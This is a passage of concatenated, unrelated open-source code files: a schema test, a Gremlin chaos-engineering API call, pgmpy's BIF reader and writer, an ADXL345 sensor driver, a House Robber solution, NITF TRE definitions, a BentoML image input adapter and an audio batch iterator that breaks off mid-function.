schema = DateTime(allowed=allowed)
with assert_errors([Error("not_allowed", {"allowed": allowed})]):
schema(datetime(1955, 11, 12, 6, 38, 00))
def test_ignores_rules_when_value_has_unexpected_type():
schema = DateTime(rules=[validate_value_has_odd_year])
with assert_errors(
[Error("unexpected_type", {"expected_type": type_name("datetime")})]
):
schema("oops")
def test_options_type_casting():
option_val = datetime(2000, 1, 1, 0, 0, 0)
option_str = "2000-01-01T00:00:00"
schema_val = DateTime(
earlier_than=option_val,
earlier_or_equal_to=option_val,
later_than=option_val,
later_or_equal_to=option_val,
allowed=[option_val],
)
schema_str = DateTime(
earlier_than=option_str,
earlier_or_equal_to=option_str,
later_than=option_str,
later_or_equal_to=option_str,
allowed=[option_str],
)
assert schema_val == schema_str
|
the-stack_106_14782
|
# -*- coding: utf-8 -*-
from functools import wraps
import json
import os
from typing import Any, Dict
from logzero import logger
import requests
from chaoslib.exceptions import FailedActivity
from chaoslib.types import Secrets
from chaosgremlin import auth, GREMLIN_BASE_URL
__all__ = ["attack"]
def attack(command: Dict[str, Any], target: Dict[str, Any],
labels: Dict[str, Any] = None, tags: Dict[str, Any] = None,
secrets: Secrets = None):
"""
Triggers an attack on the CPU of a host. Please refer to Gremlin's
documentation for the meaning of each argument. The `secrets` argument is
a mapping which must have the following keys: `email`, `password` and
`org_name`.
The function returns the identifier of the attack or raises
:exc:`FailedActivity` if the authentication failed and
when the attack could not be started.
.. seealso:: https://www.gremlin.com/docs/
"""
session = auth(**secrets)
url = "{base}/attacks/new".format(base=GREMLIN_BASE_URL)
r = requests.post(
url,
headers={
"Authorization": session["header"]
},
json={
"command": command,
"target": target,
"labels": labels,
"tags": tags
})
if r.status_code != 201:
raise FailedActivity(
"Gremlin attack failed: {m}".format(m=r.text))
result = r.text
logger.debug("attack submitted succesfully: {r}".format(r=result))
return result
|
the-stack_106_14783
|
import collections
import re
from copy import copy
from itertools import product
from string import Template
import numpy as np
from joblib import Parallel, delayed
from pyparsing import (
CharsNotIn,
Group,
OneOrMore,
Optional,
Suppress,
Word,
ZeroOrMore,
alphanums,
cppStyleComment,
nums,
printables,
)
from pgmpy.factors.discrete import TabularCPD
from pgmpy.models import BayesianNetwork
class BIFReader(object):
"""
Base class for reading network file in bif format
"""
def __init__(self, path=None, string=None, include_properties=False, n_jobs=-1):
"""
Initializes a BIFReader object.
Parameters
----------
path : file or str
File of bif data
string : str
String of bif data
include_properties: boolean
If True, gets the properties tag from the file and stores in graph properties.
n_jobs: int (default: -1)
Number of jobs to run in parallel. `-1` means use all processors.
Examples
--------
# dog-problem.bif file is present at
# http://www.cs.cmu.edu/~javabayes/Examples/DogProblem/dog-problem.bif
>>> from pgmpy.readwrite import BIFReader
>>> reader = BIFReader("bif_test.bif")
<pgmpy.readwrite.BIF.BIFReader object at 0x7f2375621cf8>
>>> model = reader.get_model()
"""
if path:
with open(path, "r") as network:
self.network = network.read()
elif string:
self.network = string
else:
raise ValueError("Must specify either path or string")
self.n_jobs = n_jobs
self.include_properties = include_properties
if '"' in self.network:
# Replacing quotes by spaces to remove case sensitivity like:
# "Dog-Problem" and Dog-problem
# or "true""false" and "true" "false" and true false
self.network = self.network.replace('"', " ")
if "/*" in self.network or "//" in self.network:
self.network = cppStyleComment.suppress().transformString(
self.network
) # removing comments from the file
(
self.name_expr,
self.state_expr,
self.property_expr,
) = self.get_variable_grammar()
self.probability_expr, self.cpd_expr = self.get_probability_grammar()
self.network_name = self.get_network_name()
self.variable_names = self.get_variables()
self.variable_states = self.get_states()
if self.include_properties:
self.variable_properties = self.get_property()
self.variable_parents = self.get_parents()
self.variable_cpds = self.get_values()
self.variable_edges = self.get_edges()
def get_variable_grammar(self):
"""
A method that returns variable grammar
"""
# Defining a expression for valid word
word_expr = Word(alphanums + "_" + "-")
word_expr2 = Word(initChars=printables, excludeChars=["{", "}", ",", " "])
name_expr = Suppress("variable") + word_expr + Suppress("{")
state_expr = ZeroOrMore(word_expr2 + Optional(Suppress(",")))
# Defining a variable state expression
variable_state_expr = (
Suppress("type")
+ Suppress(word_expr)
+ Suppress("[")
+ Suppress(Word(nums))
+ Suppress("]")
+ Suppress("{")
+ Group(state_expr)
+ Suppress("}")
+ Suppress(";")
)
# variable states is of the form type description [args] { val1, val2 }; (comma may or may not be present)
property_expr = (
Suppress("property") + CharsNotIn(";") + Suppress(";")
) # Creating a expr to find property
return name_expr, variable_state_expr, property_expr
def get_probability_grammar(self):
"""
A method that returns probability grammar
"""
# Creating valid word expression for probability, it is of the format
# wor1 | var2 , var3 or var1 var2 var3 or simply var
word_expr = (
Word(alphanums + "-" + "_")
+ Suppress(Optional("|"))
+ Suppress(Optional(","))
)
word_expr2 = Word(
initChars=printables, excludeChars=[",", ")", " ", "("]
) + Suppress(Optional(","))
# creating an expression for valid numbers, of the format
# 1.00 or 1 or 1.00. 0.00 or 9.8e-5 etc
num_expr = Word(nums + "-" + "+" + "e" + "E" + ".") + Suppress(Optional(","))
probability_expr = (
Suppress("probability")
+ Suppress("(")
+ OneOrMore(word_expr)
+ Suppress(")")
)
optional_expr = Suppress("(") + OneOrMore(word_expr2) + Suppress(")")
probab_attributes = optional_expr | Suppress("table")
cpd_expr = probab_attributes + OneOrMore(num_expr)
return probability_expr, cpd_expr
def variable_block(self):
start = re.finditer("variable", self.network)
for index in start:
end = self.network.find("}\n", index.start())
yield self.network[index.start() : end]
def probability_block(self):
start = re.finditer("probability", self.network)
for index in start:
end = self.network.find("}\n", index.start())
yield self.network[index.start() : end]
def get_network_name(self):
"""
Returns the name of the network
Example
---------------
>>> from pgmpy.readwrite import BIFReader
>>> reader = BIF.BifReader("bif_test.bif")
>>> reader.network_name()
'Dog-Problem'
"""
start = self.network.find("network")
end = self.network.find("}\n", start)
# Creating a network attribute
network_attribute = Suppress("network") + Word(alphanums + "_" + "-") + "{"
network_name = network_attribute.searchString(self.network[start:end])[0][0]
return network_name
def get_variables(self):
"""
Returns list of variables of the network
Example
-------------
>>> from pgmpy.readwrite import BIFReader
>>> reader = BIFReader("bif_test.bif")
>>> reader.get_variables()
['light-on','bowel_problem','dog-out','hear-bark','family-out']
"""
variable_names = []
for block in self.variable_block():
name = self.name_expr.searchString(block)[0][0]
variable_names.append(name)
return variable_names
def get_states(self):
"""
Returns the states of variables present in the network
Example
-----------
>>> from pgmpy.readwrite import BIFReader
>>> reader = BIFReader("bif_test.bif")
>>> reader.get_states()
{'bowel-problem': ['true','false'],
'dog-out': ['true','false'],
'family-out': ['true','false'],
'hear-bark': ['true','false'],
'light-on': ['true','false']}
"""
variable_states = {}
for block in self.variable_block():
name = self.name_expr.searchString(block)[0][0]
variable_states[name] = list(self.state_expr.searchString(block)[0][0])
return variable_states
def get_property(self):
"""
Returns the property of the variable
Example
-------------
>>> from pgmpy.readwrite import BIFReader
>>> reader = BIFReader("bif_test.bif")
>>> reader.get_property()
{'bowel-problem': ['position = (335, 99)'],
'dog-out': ['position = (300, 195)'],
'family-out': ['position = (257, 99)'],
'hear-bark': ['position = (296, 268)'],
'light-on': ['position = (218, 195)']}
"""
variable_properties = {}
for block in self.variable_block():
name = self.name_expr.searchString(block)[0][0]
properties = self.property_expr.searchString(block)
variable_properties[name] = [y.strip() for x in properties for y in x]
return variable_properties
def get_parents(self):
"""
Returns the parents of the variables present in the network
Example
--------
>>> from pgmpy.readwrite import BIFReader
>>> reader = BIFReader("bif_test.bif")
>>> reader.get_parents()
{'bowel-problem': [],
'dog-out': ['family-out', 'bowel-problem'],
'family-out': [],
'hear-bark': ['dog-out'],
'light-on': ['family-out']}
"""
variable_parents = {}
for block in self.probability_block():
names = self.probability_expr.searchString(block.split("\n")[0])[0]
variable_parents[names[0]] = names[1:]
return variable_parents
def _get_values_from_block(self, block):
names = self.probability_expr.searchString(block)
var_name, parents = names[0][0], names[0][1:]
cpds = self.cpd_expr.searchString(block)
# Check if the block is a table.
if bool(re.search(".*\\n[ ]*table .*\n.*", block)):
arr = np.array([float(j) for i in cpds for j in i])
arr = arr.reshape(
(
len(self.variable_states[var_name]),
arr.size // len(self.variable_states[var_name]),
)
)
else:
arr_length = np.prod([len(self.variable_states[var]) for var in parents])
arr = np.zeros((len(self.variable_states[var_name]), arr_length))
values_dict = {}
for prob_line in cpds:
states = prob_line[: len(parents)]
vals = [float(i) for i in prob_line[len(parents) :]]
values_dict[tuple(states)] = vals
for index, combination in enumerate(
product(*[self.variable_states[var] for var in parents])
):
arr[:, index] = values_dict[combination]
return var_name, arr
def get_values(self):
"""
Returns the CPD of the variables present in the network
Example
--------
>>> from pgmpy.readwrite import BIFReader
>>> reader = BIFReader("bif_test.bif")
>>> reader.get_values()
{'bowel-problem': np.array([[0.01],
[0.99]]),
'dog-out': np.array([[0.99, 0.97, 0.9, 0.3],
[0.01, 0.03, 0.1, 0.7]]),
'family-out': np.array([[0.15],
[0.85]]),
'hear-bark': np.array([[0.7, 0.01],
[0.3, 0.99]]),
'light-on': np.array([[0.6, 0.05],
[0.4, 0.95]])}
"""
cpd_values = Parallel(n_jobs=self.n_jobs)(
delayed(self._get_values_from_block)(block)
for block in self.probability_block()
)
variable_cpds = {}
for var_name, arr in cpd_values:
variable_cpds[var_name] = arr
return variable_cpds
def get_edges(self):
"""
Returns the edges of the network
Example
--------
>>> from pgmpy.readwrite import BIFReader
>>> reader = BIFReader("bif_test.bif")
>>> reader.get_edges()
[['family-out', 'light-on'],
['family-out', 'dog-out'],
['bowel-problem', 'dog-out'],
['dog-out', 'hear-bark']]
"""
edges = [
[value, key]
for key in self.variable_parents.keys()
for value in self.variable_parents[key]
]
return edges
def get_model(self, state_name_type=str):
"""
Returns the Bayesian Model read from the file/str.
Parameters
----------
state_name_type: int, str or bool (default: str)
The data type to which to convert the state names of the variables.
Example
----------
>>> from pgmpy.readwrite import BIFReader
>>> reader = BIFReader("bif_test.bif")
>>> reader.get_model()
<pgmpy.models.BayesianNetwork.BayesianNetwork object at 0x7f20af154320>
"""
try:
model = BayesianNetwork()
model.add_nodes_from(self.variable_names)
model.add_edges_from(self.variable_edges)
model.name = self.network_name
tabular_cpds = []
for var in sorted(self.variable_cpds.keys()):
values = self.variable_cpds[var]
sn = {
p_var: list(map(state_name_type, self.variable_states[p_var]))
for p_var in self.variable_parents[var]
}
sn[var] = list(map(state_name_type, self.variable_states[var]))
cpd = TabularCPD(
var,
len(self.variable_states[var]),
values,
evidence=self.variable_parents[var],
evidence_card=[
len(self.variable_states[evidence_var])
for evidence_var in self.variable_parents[var]
],
state_names=sn,
)
tabular_cpds.append(cpd)
model.add_cpds(*tabular_cpds)
if self.include_properties:
for node, properties in self.variable_properties.items():
for prop in properties:
prop_name, prop_value = map(
lambda t: t.strip(), prop.split("=")
)
model.nodes[node][prop_name] = prop_value
return model
except AttributeError:
raise AttributeError(
"First get states of variables, edges, parents and network name"
)
class BIFWriter(object):
"""
Base class for writing BIF network file format
"""
def __init__(self, model):
"""
Initialise a BIFWriter Object
Parameters
----------
model: BayesianNetwork Instance
Examples
---------
>>> from pgmpy.readwrite import BIFWriter
>>> from pgmpy.utils import get_example_model
>>> asia = get_example_model('asia')
>>> writer = BIFWriter(asia)
>>> writer
<writer_BIF.BIFWriter at 0x7f05e5ea27b8>
>>> writer.write_bif('asia.bif')
"""
if not isinstance(model, BayesianNetwork):
raise TypeError("model must be an instance of BayesianNetwork")
self.model = model
if not self.model.name:
self.network_name = "unknown"
else:
self.network_name = self.model.name
self.variable_states = self.get_states()
self.property_tag = self.get_properties()
self.variable_parents = self.get_parents()
self.tables = self.get_cpds()
def BIF_templates(self):
"""
Create template for writing in BIF format
"""
network_template = Template("network $name {\n}\n")
# property tag may or may not be present in model,and since no of properties
# can be more than one , will replace them accoriding to format otherwise null
variable_template = Template(
"""variable $name {
type discrete [ $no_of_states ] { $states };
$properties}\n"""
)
property_template = Template(" property $prop ;\n")
# $variable_ here is name of variable, used underscore for clarity
probability_template = Template(
"""probability ( $variable_$separator_$parents ) {
table $values ;
}\n"""
)
conditional_probability_template_total = Template(
"""probability ( $variable_$separator_$parents ) {
$values
}\n"""
)
conditional_probability_template = Template(""" ( $state ) $values;\n""")
return (
network_template,
variable_template,
property_template,
probability_template,
conditional_probability_template_total,
conditional_probability_template,
)
def __str__(self):
"""
Returns the BIF format as string
"""
(
network_template,
variable_template,
property_template,
probability_template,
conditional_probability_template_total,
conditional_probability_template,
) = self.BIF_templates()
network = ""
network += network_template.substitute(name=self.network_name)
variables = self.model.nodes()
for var in sorted(variables):
no_of_states = str(len(self.variable_states[var]))
states = ", ".join(self.variable_states[var])
if not self.property_tag[var]:
properties = ""
else:
properties = ""
for prop_val in self.property_tag[var]:
properties += property_template.substitute(prop=prop_val)
network += variable_template.substitute(
name=var,
no_of_states=no_of_states,
states=states,
properties=properties,
)
for var in sorted(variables):
if not self.variable_parents[var]:
parents = ""
separator = ""
cpd = ", ".join(map(str, self.tables[var]))
network += probability_template.substitute(
variable_=var, separator_=separator, parents=parents, values=cpd
)
else:
parents_str = ", ".join(self.variable_parents[var])
separator = " | "
cpd = self.model.get_cpds(var)
cpd_values_transpose = cpd.get_values().T
parent_states = product(
*[cpd.state_names[var] for var in cpd.variables[1:]]
)
all_cpd = ""
for index, state in enumerate(parent_states):
all_cpd += conditional_probability_template.substitute(
state=", ".join(map(str, state)),
values=", ".join(map(str, cpd_values_transpose[index, :])),
)
network += conditional_probability_template_total.substitute(
variable_=var,
separator_=separator,
parents=parents_str,
values=all_cpd,
)
return network
def get_variables(self):
"""
Add variables to BIF
Returns
-------
list: a list containing names of variable
Example
-------
>>> from pgmpy.readwrite import BIFReader, BIFWriter
>>> model = BIFReader('dog-problem.bif').get_model()
>>> writer = BIFWriter(model)
>>> writer.get_variables()
['bowel-problem', 'family-out', 'hear-bark', 'light-on', 'dog-out']
"""
variables = self.model.nodes()
return variables
def get_states(self):
"""
Add states to variable of BIF
Returns
-------
dict: dict of type {variable: a list of states}
Example
-------
>>> from pgmpy.readwrite import BIFReader, BIFWriter
>>> model = BIFReader('dog-problem.bif').get_model()
>>> writer = BIFWriter(model)
>>> writer.get_states()
{'bowel-problem': ['bowel-problem_0', 'bowel-problem_1'],
'dog-out': ['dog-out_0', 'dog-out_1'],
'family-out': ['family-out_0', 'family-out_1'],
'hear-bark': ['hear-bark_0', 'hear-bark_1'],
'light-on': ['light-on_0', 'light-on_1']}
"""
variable_states = {}
cpds = self.model.get_cpds()
for cpd in cpds:
variable = cpd.variable
variable_states[variable] = []
for state in cpd.state_names[variable]:
variable_states[variable].append(str(state))
return variable_states
def get_properties(self):
"""
Add property to variables in BIF
Returns
-------
dict: dict of type {variable: list of properties }
Example
-------
>>> from pgmpy.readwrite import BIFReader, BIFWriter
>>> model = BIFReader('dog-problem.bif').get_model()
>>> writer = BIFWriter(model)
>>> writer.get_properties()
{'bowel-problem': ['position = (335, 99)'],
'dog-out': ['position = (300, 195)'],
'family-out': ['position = (257, 99)'],
'hear-bark': ['position = (296, 268)'],
'light-on': ['position = (218, 195)']}
"""
variables = self.model.nodes()
property_tag = {}
for variable in sorted(variables):
properties = self.model.nodes[variable]
properties = collections.OrderedDict(sorted(properties.items()))
property_tag[variable] = []
for prop, val in properties.items():
property_tag[variable].append(str(prop) + " = " + str(val))
return property_tag
def get_parents(self):
"""
Add the parents to BIF
Returns
-------
dict: dict of type {variable: a list of parents}
Example
-------
>>> from pgmpy.readwrite import BIFReader, BIFWriter
>>> model = BIFReader('dog-problem.bif').get_model()
>>> writer = BIFWriter(model)
>>> writer.get_parents()
{'bowel-problem': [],
'dog-out': ['bowel-problem', 'family-out'],
'family-out': [],
'hear-bark': ['dog-out'],
'light-on': ['family-out']}
"""
cpds = self.model.get_cpds()
variable_parents = {}
for cpd in cpds:
variable_parents[cpd.variable] = cpd.variables[1:]
return variable_parents
def get_cpds(self):
"""
Adds tables to BIF
Returns
-------
dict: dict of type {variable: array}
Example
-------
>>> from pgmpy.readwrite import BIFReader, BIFWriter
>>> model = BIFReader('dog-problem.bif').get_model()
>>> writer = BIFWriter(model)
>>> writer.get_cpds()
{'bowel-problem': array([ 0.01, 0.99]),
'dog-out': array([ 0.99, 0.97, 0.9 , 0.3 , 0.01, 0.03, 0.1 , 0.7 ]),
'family-out': array([ 0.15, 0.85]),
'hear-bark': array([ 0.7 , 0.01, 0.3 , 0.99]),
'light-on': array([ 0.6 , 0.05, 0.4 , 0.95])}
"""
cpds = self.model.get_cpds()
tables = {}
for cpd in cpds:
tables[cpd.variable] = cpd.values.ravel()
return tables
def write_bif(self, filename):
"""
Writes the BIF data into a file
Parameters
----------
filename : Name of the file
Example
-------
>>> from pgmpy.utils import get_example_model
>>> from pgmpy.readwrite import BIFReader, BIFWriter
>>> asia = get_example_model('asia')
>>> writer = BIFWriter(asia)
>>> writer.write_bif(filename='asia.bif')
"""
writer = self.__str__()
with open(filename, "w") as fout:
fout.write(writer)
|
the-stack_106_14787
|
from machine import Pin,I2C
import math
import time
device = const(0x53)
regAddress = const(0x32)
TO_READ = 6
buff = bytearray(6)
class ADXL345:
def __init__(self,i2c,addr=device):
self.addr = addr
self.i2c = i2c
b = bytearray(1)
b[0] = 0
self.i2c.writeto_mem(self.addr,0x2d,b)
b[0] = 16
self.i2c.writeto_mem(self.addr,0x2d,b)
b[0] = 8
self.i2c.writeto_mem(self.addr,0x2d,b)
@property
def xValue(self):
buff = self.i2c.readfrom_mem(self.addr,regAddress,TO_READ)
x = (int(buff[1]) << 8) | buff[0]
if x > 32767:
x -= 65536
return x
@property
def yValue(self):
buff = self.i2c.readfrom_mem(self.addr,regAddress,TO_READ)
y = (int(buff[3]) << 8) | buff[2]
if y > 32767:
y -= 65536
return y
@property
def zValue(self):
buff = self.i2c.readfrom_mem(self.addr,regAddress,TO_READ)
z = (int(buff[5]) << 8) | buff[4]
if z > 32767:
z -= 65536
return z
def RP_calculate(self,x,y,z):
roll = math.atan2(y , z) * 57.3
pitch = math.atan2((- x) , math.sqrt(y * y + z * z)) * 57.3
return roll,pitch
|
the-stack_106_14788
|
class Language:
verbose_name = None
language_id = None
def load(client):
headers = {"Content-Type": "application/json"}
r = client.endpoint.get(f"{client.endpoint}/submissions/", headers=headers)
r.raise_for_status()
languages = []
for l in r.json():
language = Language()
language.verbose_name = l["name"]
language.language_id = l["id"]
languages.append(language)
return languages
|
the-stack_106_14790
|
# https://leetcode.com/problems/house-robber/
# You are a professional robber planning to rob houses along a street. Each house
# has a certain amount of money stashed, the only constraint stopping you from
# robbing each of them is that adjacent houses have security systems connected and
# it will automatically contact the police if two adjacent houses were broken into
# on the same night.
# Given an integer array nums representing the amount of money of each house,
# return the maximum amount of money you can rob tonight without alerting the
# police.
################################################################################
# dp[i] = max money in nums[0...i-1]
# dp[i] = max(dp[i-1], dp[i-2] + nums[i-1])
class Solution:
def rob(self, nums: List[int]) -> int:
if len(nums) == 1: return nums[0]
# base
n = len(nums)
dp = [0] * (n + 1)
dp[1] = nums[0]
# dp
for i in range(2, n + 1):
dp[i] = max(dp[i-1], # not rob nums[i-1]
dp[i-2] + nums[i-1]) # rob nums[i-1]
return dp[-1]
|
the-stack_106_14792
|
import numpy as np
import sharpy.utils.algebra as algebra
def flightcon_file_parser(fc_dict):
fc = fc_dict['FlightCon']
fc['u_inf'] = float(fc['u_inf'])
fc['alpha'] = float(fc['alpha'])*np.pi/180.0
fc['beta'] = float(fc['beta'])*np.pi/180.0
fc['rho_inf'] = float(fc['rho_inf'])
fc['c_ref'] = float(fc['c_ref'])
fc['b_ref'] = float(fc['b_ref'])
def alpha_beta_to_direction(alpha, beta):
direction = np.array([1, 0, 0])
alpha_rot = algebra.rotation3d_y(alpha)
beta_rot = algebra.rotation3d_z(beta)
direction = np.dot(beta_rot, np.dot(alpha_rot, direction))
return direction
|
the-stack_106_14795
|
from ..tre_elements import TREExtension, TREElement
__classification__ = "UNCLASSIFIED"
__author__ = "Thomas McCullough"
class AIS(TREElement):
def __init__(self, value):
super(AIS, self).__init__()
self.add_field('AISDLVL', 's', 3, value)
class PIXQUAL(TREElement):
def __init__(self, value):
super(PIXQUAL, self).__init__()
self.add_field('PQ_CONDITION', 's', 40, value)
class PIXQLAType(TREElement):
def __init__(self, value):
super(PIXQLAType, self).__init__()
self.add_field('NUMAIS', 's', 3, value)
if self.NUMAIS != 'ALL':
self.add_loop('AISs', int(self.NUMAIS), AIS, value)
self.add_field('NPIXQUAL', 'd', 4, value)
self.add_field('PQ_BIT_VALUE', 's', 1, value)
self.add_loop('PIXQUALs', self.NPIXQUAL, PIXQUAL, value)
class PIXQLA(TREExtension):
_tag_value = 'PIXQLA'
_data_type = PIXQLAType
|
the-stack_106_14796
|
# Copyright 2019 Atalaya Tech, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import BinaryIO, Iterable, Sequence, Tuple
from bentoml.adapters.file_input import FileInput
from bentoml.adapters.utils import (
check_file_extension,
get_default_accept_image_formats,
)
from bentoml.types import InferenceTask
from bentoml.utils.lazy_loader import LazyLoader
# BentoML optional dependencies, using lazy load to avoid ImportError
imageio = LazyLoader('imageio', globals(), 'imageio')
numpy = LazyLoader('numpy', globals(), 'numpy')
ApiFuncArgs = Tuple[
Sequence['numpy.ndarray'],
]
class ImageInput(FileInput):
"""Transform incoming image data from http request, cli or lambda event into numpy
array.
Handle incoming image data from different sources, transform them into numpy array
and pass down to user defined API functions
* If you want to operate raw image file stream or PIL.Image objects, use lowlevel
alternative FileInput.
Args:
accept_image_formats (string[]): A list of acceptable image formats.
Default value is loaded from bentoml config
'apiserver/default_image_input_accept_file_extensions', which is
set to ['.jpg', '.png', '.jpeg', '.tiff', '.webp', '.bmp'] by default.
List of all supported format can be found here:
https://imageio.readthedocs.io/en/stable/formats.html
pilmode (string): The pilmode to be used for reading image file into numpy
array. Default value is 'RGB'. Find more information at:
https://imageio.readthedocs.io/en/stable/format_png-pil.html
Raises:
ImportError: imageio package is required to use ImageInput
Example:
>>> from bentoml import BentoService, api, artifacts
>>> from bentoml.frameworks.tensorflow import TensorflowSavedModelArtifact
>>> from bentoml.adapters import ImageInput
>>>
>>> CLASS_NAMES = ['cat', 'dog']
>>>
>>> @artifacts([TensorflowSavedModelArtifact('classifier')])
>>> class PetClassification(BentoService):
>>> @api(input=ImageInput())
>>> def predict(self, image_ndarrays):
>>> results = self.artifacts.classifer.predict(image_ndarrays)
>>> return [CLASS_NAMES[r] for r in results]
"""
def __init__(
self, accept_image_formats=None, pilmode="RGB", **base_kwargs,
):
assert imageio, "`imageio` dependency can be imported"
super().__init__(**base_kwargs)
if 'input_names' in base_kwargs:
raise TypeError(
"ImageInput doesn't take input_names as parameters since bentoml 0.8."
"Update your Service definition "
"or use LegacyImageInput instead(not recommended)."
)
self.pilmode = pilmode
self.accept_image_formats = set(
accept_image_formats or get_default_accept_image_formats()
)
@property
def config(self):
return {
# Converting to list, google.protobuf.Struct does not work with tuple type
"accept_image_formats": list(self.accept_image_formats),
"pilmode": self.pilmode,
}
@property
def request_schema(self):
return {
"image/*": {"schema": {"type": "string", "format": "binary"}},
"multipart/form-data": {
"schema": {
"type": "object",
"properties": {
"image_file": {"type": "string", "format": "binary"}
},
}
},
}
@property
def pip_dependencies(self):
return ["imageio"]
def extract_user_func_args(
self, tasks: Iterable[InferenceTask[BinaryIO]]
) -> ApiFuncArgs:
img_list = []
for task in tasks:
if getattr(task.data, "name", None) and not check_file_extension(
task.data.name, self.accept_image_formats
):
task.discard(
http_status=400,
err_msg=f"Current service only accepts "
f"{self.accept_image_formats} formats",
)
continue
try:
img_array = imageio.imread(task.data, pilmode=self.pilmode)
img_list.append(img_array)
except ValueError as e:
task.discard(http_status=400, err_msg=str(e))
return (img_list,)
|
the-stack_106_14797
|
"""Utilities for real-time data augmentation on image data.
"""
from typing import List, Tuple
import os
import threading
import queue
import inspect
import numpy as np
from mltk.core import get_mltk_logger
from mltk.core.keras import DataSequence
from mltk.utils.process_pool_manager import ProcessPoolManager
class ParallelIterator(DataSequence):
"""Base class for image data iterators.
# Arguments
n: Integer, total number of samples in the dataset to loop over.
batch_size: Integer, size of a batch.
shuffle: Boolean, whether to shuffle the data between epochs.
seed: Random seeding for data shuffling.
"""
white_list_formats = ('wav')
def __init__(self, n, batch_size, shuffle, seed, process_params):
super().__init__()
self.n = n
self.batch_size = batch_size
self.seed = seed
self.total_batches_seen = 0
self.batch_index = 0
self.shuffle = shuffle
self.process_params = process_params
self.batch_generation_started = threading.Event()
self.batch_generation_shutdown = threading.Event()
self.batch_data = BatchData(len(self), self.shuffle, shutdown_event=self.batch_generation_shutdown)
t = threading.Thread(
target=self._generate_batch_data_safe,
name=f'Batch data generator:{process_params.subset}'
)
t.setDaemon(True)
t.start()
pool_manager_kwargs = dict(
cores=self.cores,
callback=self._on_batch_data_ready,
debug=self.debug,
)
# If specified,
# Add the CUDA_VISIBLE_DEVICES=-1 environment variable
# so TF doesn't use the GPU in the subprocesses
if self.disable_gpu_in_subprocesses:
pool_manager_kwargs['env'] = dict(
CUDA_VISIBLE_DEVICES='-1',
)
# Re-use the processing pool if one has already been created
if '_multiprocess_pool' in globals():
pool_manager_kwargs['pool'] = globals()['_multiprocess_pool']
self.pool = ProcessPoolManager(**pool_manager_kwargs)
globals()['_multiprocess_pool'] = self.pool.pool
def reset(self):
self.batch_generation_started.clear()
self.batch_data.reset()
self.pool.reset()
self.batch_data.reset()
def shutdown(self):
self.batch_generation_shutdown.set()
self.reset()
self.pool.close()
if '_multiprocess_pool' in globals():
del globals()['_multiprocess_pool']
def __getitem__(self, idx):
if idx >= len(self):
raise ValueError('Asked to retrieve element {idx}, '
'but the Sequence '
'has length {length}'.format(idx=idx,
length=len(self)))
if self.batch_generation_shutdown.is_set():
raise Exception('Data generator has been shutdown')
self.batch_generation_started.set()
return self.batch_data.get(idx)
def __len__(self):
return (self.n + self.batch_size - 1) // self.batch_size # round up
def on_epoch_end(self):
pass
def __iter__(self):
# Needed if we want to do something like:
# for x, y in data_gen.flow(...):
self.batch_index = 0
return self
def __next__(self, *args, **kwargs):
return self.next(*args, **kwargs)
def next(self):
"""For python 2.x.
# Returns
The next batch.
"""
if self.batch_index >= len(self):
# Clear the started flag, but do NOT reset
# This way we don't waste any processed batch data
self.batch_generation_started.clear()
raise StopIteration()
if self.batch_generation_shutdown.is_set():
raise Exception('Data generator has been shutdown')
self.batch_generation_started.set()
retval = self.batch_data.get(self.batch_index)
self.batch_index += 1
return retval
def _generate_batch_data_safe(self):
try:
self._generate_batch_data()
except Exception as e:
get_mltk_logger().error(f'Exception during batch data processing, err: {e}', exc_info=e)
self.shutdown()
def _generate_batch_data(self):
while not self.batch_generation_shutdown.is_set():
# Wait for training to start
if not self.batch_generation_started.wait(timeout=0.1):
continue
if self.seed is not None:
np.random.seed(self.seed + self.total_batches_seen)
if self.shuffle:
index_array = np.random.permutation(self.n)
else:
index_array = np.arange(self.n)
while self.batch_data.have_more_indices:
while self.batch_data.request_count == 0 and self.batch_data.qsize() > self.max_batches_pending:
self.batch_data.wait()
if not self.batch_generation_started.is_set():
break
idx = self.batch_data.next_index()
self.total_batches_seen += 1
offset = idx*self.batch_size
batch_index_chunk = index_array[offset:offset+self.batch_size]
batch_filenames = []
batch_classes = []
for batch_index in batch_index_chunk:
batch_filenames.append(self.filenames[batch_index])
batch_classes.append(self.classes[batch_index])
get_batch_function = self.process_params.get_batch_function or get_batches_of_transformed_samples
if not self.batch_generation_shutdown.is_set():
self.pool.process(
get_batch_function,
idx,
batch_filenames,
batch_classes,
self.process_params
)
self.batch_data.reset_indices()
def _on_batch_data_ready(self, result):
self.batch_data.put(result[0], result[1])
class ParallelProcessParams():
"""Adds methods related to getting batches from filenames
It includes the logic to transform image files to batches.
"""
def __init__(
self,
audio_data_generator,
sample_rate,
sample_length_ms,
sample_shape,
save_to_dir,
save_prefix,
save_format,
subset,
class_indices,
dtype,
frontend_dtype,
directory,
class_mode,
get_batch_function,
noaug_preprocessing_function,
preprocessing_function,
postprocessing_function,
frontend_enabled,
add_channel_dimension
):
self.class_indices = class_indices
self.dtype = dtype
self.frontend_dtype = frontend_dtype
self.directory = directory
self.class_mode = class_mode
self.audio_data_generator = audio_data_generator
self.get_batch_function = get_batch_function
self.noaug_preprocessing_function = noaug_preprocessing_function
self.preprocessing_function = preprocessing_function
self.postprocessing_function = postprocessing_function
self.frontend_enabled = frontend_enabled
self.add_channel_dimension = add_channel_dimension
self.sample_rate = sample_rate
self.sample_length_ms = sample_length_ms
self.sample_shape = sample_shape
if frontend_enabled and len(self.sample_shape) == 2 and add_channel_dimension:
self.sample_shape += (1,) # The 'depth' dimension to 1
self.save_to_dir = save_to_dir
self.save_prefix = save_prefix
self.save_format = save_format
if subset is not None:
validation_split = audio_data_generator.validation_split
if subset == 'validation':
split = (0, validation_split)
elif subset == 'training':
split = (validation_split, 1)
else:
raise ValueError(
'Invalid subset name: %s;'
'expected "training" or "validation"' % (subset,))
else:
split = None
self.split = split
self.subset = subset
def get_batches_of_transformed_samples(
batch_index:int,
filenames:List[str],
classes:List[int],
params:ParallelProcessParams
) -> Tuple[int, Tuple[np.ndarray, np.ndarray]]:
"""Gets a batch of transformed samples.
Arguments:
batch_index: Index of this batch
filenames: List of filenames for this batch
classes: List of class ids mapping to the filenames list
params: Generator parameters
# Returns
A batch of transformed samples: batch_index, (batch_x, batch_y)
"""
import librosa
batch_shape = (len(filenames),) + params.sample_shape
